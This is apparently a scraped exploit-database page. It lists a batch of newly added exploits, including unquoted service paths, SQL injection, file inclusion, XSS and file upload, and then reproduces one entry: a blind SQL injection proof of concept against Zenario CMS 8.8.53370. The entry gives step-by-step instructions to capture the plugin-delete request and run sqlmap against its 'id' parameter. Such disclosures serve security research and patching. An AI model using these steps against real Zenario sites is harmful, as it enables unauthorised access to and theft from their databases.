28bd450c1a
13 changes to exploits/shellcodes Libpango 1.40.8 - Denial of Service (PoC) QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path Interactive Suite 3.6 - 'eBeam Stylus Driver' Unquoted Service Path Zenario CMS 8.8.53370 - 'id' Blind SQL Injection MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated) openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure SonLogger 4.2.3.3 - Unauthenticated Arbitrary File Upload (Metasploit)
15 lines
No EOL
669 B
Text
15 lines
No EOL
669 B
Text
# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection
|
|
# Date: 05/02/2021
|
|
# Exploit Author: Balaji Ayyasamy
|
|
# Vendor Homepage: https://zenar.io/
|
|
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8
|
|
# Version: 8.8.53370
|
|
# Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14
|
|
|
|
# Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d
|
|
|
|
Step 1 - Login to the zenario cms with admin credentials.
|
|
Step 2 - Go to modules and select plugin library.
|
|
Step 3 - Select any plugin and press delete button. Copy the delete request and send it to the sqlmap.
|
|
|
|
Command - sqlmap -r request.txt -p id |